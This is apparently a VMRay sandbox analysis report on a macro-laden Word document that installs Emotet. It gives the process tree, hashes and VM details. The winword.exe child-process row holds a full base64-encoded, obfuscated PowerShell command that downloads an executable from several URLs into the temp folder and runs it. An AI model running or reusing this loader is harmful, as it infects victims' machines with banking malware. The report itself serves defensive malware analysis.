Word Doc in Attached Email Downloads Emotet | VMRay Analyzer Report
Try VMRay Analyzer
| Creation Time | 2017-08-31 16:51 (UTC+2) |
| VM Analysis Duration Time | 00:02:36 |
| Execution Successful |
|
| Sample Filename | 49343.doc |
| Command Line Parameters |
|
| Prescript |
|
| Number of Processes | 9 |
| Termination Reason | Timeout |
| Download | Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON |
|
VTI Score
100 / 100
|
|
| VTI Database Version | 2.6 |
| VTI Rule Match Count | 31 |
| VTI Rule Type | Documents |
|
The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration. |
|
|
The operating system was rebooted during the analysis. |
| ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
|---|---|---|---|---|---|---|
| #1 | 0x9f8 | Analysis Target | Medium | winword.exe | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" | |
| #2 | 0xad4 | Child Process | Medium | powershell.exe | powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA= | #1 |
| #3 | 0xb60 | Child Process | Medium | 38763.exe | "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe" | #2 |
| #4 | 0xb74 | Child Process | Medium | 38763.exe | "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe" | #3 |
| #5 | 0xb8c | Child Process | Medium | viewcom.exe | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" | #4 |
| #6 | 0xb98 | Child Process | Medium | viewcom.exe | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" | #5 |
| #8 | 0xc70 | Child Process | Medium | viewcom.exe | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp" | #6 |
| #9 | 0xc78 | Child Process | Medium | viewcom.exe | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp" | #6 |
| #10 | 0xc80 | Child Process | Medium | viewcom.exe | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp" | #6 |
| ID | #17571 |
| MD5 Hash Value | 890ce730a3cf43f43039f114744df924 |
| SHA1 Hash Value | 19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a |
| SHA256 Hash Value | d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91 |
| Filename | 49343.doc |
| File Size | 89.00 KB (91136 bytes) |
| File Type | Word Document |
| Has VBA Macros |
|
| Analyzer Version | 2.2.0 |
| Analyzer Build Date | 2017-08-21 12:23 |
| Microsoft Office Version | 2016 |
| Microsoft Word Version | 16.0.4266.1003 |
| Internet Explorer Version | 8.0.7601.17514 |
| Chrome Version | 58.0.3029.110 |
| Firefox Version | 25.0 |
| Flash Version | 10.3.183.86 |
| Java Version | 7.0.600 |
| VM Name | win7_32_sp1-mso2016 |
| VM Architecture | x86 32-bit PAE |
| VM OS | Windows 7 |
| VM Kernel Version | 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1) |
